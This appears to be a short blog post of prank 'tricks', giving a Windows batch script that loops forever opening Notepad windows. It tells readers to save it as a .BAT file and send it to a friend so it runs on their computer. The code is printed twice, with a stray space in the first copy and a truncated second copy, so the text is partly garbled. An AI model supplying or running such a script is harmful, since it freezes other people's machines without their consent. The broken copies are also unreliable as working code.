Open Notepad Continuously in your friend's computer:
Code:
Quote
@ECHO off
:top
START %SystemRoot%\system32\notepad. exe
GOTO top Save it as "Anything.BAT" and send it.
Code:
Quote
@ECHO off
:top
START %SystemRoot%\system32\notepad.
GOTO top Save it as "Anything.BAT" and send it.
No comments:
Post a Comment